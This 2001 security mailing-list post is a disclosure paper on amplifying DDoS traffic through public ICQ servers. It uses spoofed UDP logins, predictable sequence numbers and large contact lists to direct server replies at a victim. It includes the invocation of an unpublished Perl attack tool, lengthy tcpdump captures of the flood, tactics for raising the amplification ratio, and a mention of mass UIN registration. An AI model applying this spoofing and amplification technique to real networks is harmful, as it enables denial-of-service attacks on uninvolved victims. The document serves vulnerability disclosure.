Fri, 26 Oct 2001 17:38:02 +1440000
"FreeHermit"
vulnwatch@vulnwatch.org
--------[ Public ICQ servers based DDoS
Authors : FreeHermit, _DeepFire
Date : 2001-10-26
Status : discussion paper
Contacts: icqsmurf[at]inbox[dot]ru
---[ In brief
It is possible to use public ICQ servers for traffic
multiplication with coefficient of 100 and even greater. This
means what attacker with a channel bandwidth of 38 Kbps ideally
can fill an uplink of 3,8 Mbps!
---[ Description
As it is known ICQ use UDP[1] protocol as its transport layer.
Data area of each client-side UDP packet starts with the following
header,
as of ICQ protocol vesion 5[2]:
Length Content Index Description
2 bytes 05 00 VERSION Protocol version
4 bytes 00 00 00 00 ZERO Always zero
4 bytes xx xx xx xx UIN Your UIN
4 bytes xx xx xx xx SESSION_ID Used to prevent spoofing
2 bytes xx xx COMMAND Command
2 bytes xx xx SEQ_NUM1 Sequence inits with a
random number
2 bytes xx xx SEQ_NUM2 Inits with 1 (!)
4 bytes xx xx xx xx CHECKCODE
variable xx ... PARAMETERS Parameters
Note: all client-side packets are encoded, while server ones are not[3].
SEQ_NUM1 is initialised with a random number and is increases with each
packet by 1 (!) (one of the weak spots) (ie, if first packet contains
SEQ_NUM1=123, then next one will have SEQ_NUM1=124).
SEQ_NUM2 initialises to 1, and increases by 1 with each packet unless
another value is specified (ie setting SEQ_NUM2 = 0 while sending
CMD_KEEP_ALIVE)
SESSION_ID - random number which needs to be constant for each packet of
current session, otherwise they`re ignored by the server. Also server`s
packets are marked by the same value which is done to prevent spoofing.
Theory of attack lies in the fact that nothing prevents us from
connecting to the server as registered user/users while spoofing the
source address by the victim IP (and its likely but not necessary the
field "Our IP" in the header of CMD_LOGIN[2] command) By this we`re
redirecting the server`s response traffic to the victim, because this is
posessed not only by UDP protocol weakness, but also the SEQ_NUM1 and
SEQ_NUM2 sequence rules predictability. All these factors are the
building base for our attack
---[ Realisation
For testing this attack i wrote a rather dirt perl proggie which
blindly sends packets, one beyond another with some delay. I`m sorry that
i didnt published its source code here, because it needs some cleaning
etc etc :) However if somebody wont be able to test the described
algorhytm i`ll provide it.
Lets look at my results:
% perl icqoff.pl icq.mirabilis.com 4000 yy.yy.yy.22 1027
(где yy.yy.yy.22 - victim IP, 1027 - port)
[ attacker`s tcpdump:
xx.xx.xx.100.1027 > 205.188.153.103.4000: udp 80
xx.xx.xx.100.1027 > 205.188.153.103.4000: udp 28
xx.xx.xx.100.1027 > 205.188.153.103.4000: udp 57
xx.xx.xx.100.1027 > 205.188.153.103.4000: udp 53
[ victim`s tcpdump:
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 21 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 41 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 21 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 117 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 382 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 166 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 72 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 117 (DF)
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 382 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 166 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 72 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 117 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 382 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 166 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 72 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 117 (DF)
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 382 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 166 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 72 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 117 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 382 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 166 (DF)
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 72 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 117 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 382 (DF)
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 166 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 72 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 72 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 117 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 382 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 166 (DF)
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 72 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 117 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 382 (DF)
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 166 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 72 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 117 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 382 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 166 (DF)
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 72 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 117 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 382 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 166 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 72 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 117 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 382 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 166 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 72 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 117 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 382 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 166 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 72 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 117 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 382 (DF)
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 166 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 72 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 117 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 382 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
205.188.153.103.4000 > yy.yy.yy.22.1027: udp 21 (DF)
yy.yy.yy.22 > 205.188.153.103: icmp: yy.yy.yy.22 udp port 1027
unreachable
( Note: packet length is specified without IP(20) и UDP(8) )
It is obvious from the dumps that victim is answering the packets
it receives with the ICMP unreachable message, but server ignores it and
continues to send ~11-12 retries with a nearly 6 sec delay in the hope
the other side hears him. These packets servs to inform the victim who of
its contactlist is online. After some simple math we see that the
request/answer rate is 330/10110 which is close to 1/30 - pretty decent
value.
[ Scenario I ]
In the previous realisation we had reached by far not the maximal
traffic multiplication rate, because the attacker used a rather short
8-entry contactlist.
xx.xx.xx.100.1027 > 205.188.153.103.4000: udp 57
However it is possible to send the list of 100 random online users, or
list of our special users, which are constantly kept online.
xx.xx.xx.100.1027 > 205.188.153.103.4000: udp 425
This leads to the better-than-linear answer growth
1: 205.188.153.103.4000 > yy.yy.yy.22.1027: udp 382 (DF)
2: 205.188.153.103.4000 > yy.yy.yy.22.1027: udp 382 (DF)
3: 205.188.153.103.4000 > yy.yy.yy.22.1027: udp 382 (DF)
.
.
.
18: 205.188.153.103.4000 > yy.yy.yy.22.1027: udp 382 (DF)
19: 205.188.153.103.4000 > yy.yy.yy.22.1027: udp 382 (DF)
20: 205.188.153.103.4000 > yy.yy.yy.22.1027: udp 382 (DF)
...and 10 times more, each time by 20 packets...
This time the multiplication coefficient became equal to 130, which
discovers, as already told, the non-linear dependency of the multiplier
from the contact list length.
This means that the attacker should do its best by constantly
searching online users or creating and maintaining them in the online
state.
[ Other scenarios ]
In other cases for increasing the traffic coherency we`re able to
additionally send the search requests (CMD_SEARCH_UIN, CMD_SEARCH_USER),
various messages (CMD_SEND_MESSAGE) and acknowledgement messages
(CMD_ACK)
so that 6 seconds timeouts can be done in parallel, and we can use all
the
time while server thinks we`re "online".
Described above ICQ intrinsics can be used for only DDoS attacks,
but also for fast registrations of huge diapasones of UINs from different
IPs.
---[ Additional info
[1] RFC 768 User Datagram Protocol
[2] Specs for version 5 of the ICQ protocol
http://www.algonet.se/~henisak/icq/icqv5.html
[3] Encryption and checkcode of the ICQ protocol V5
http://www.algonet.se/~henisak/icq/encrypt-V5.txt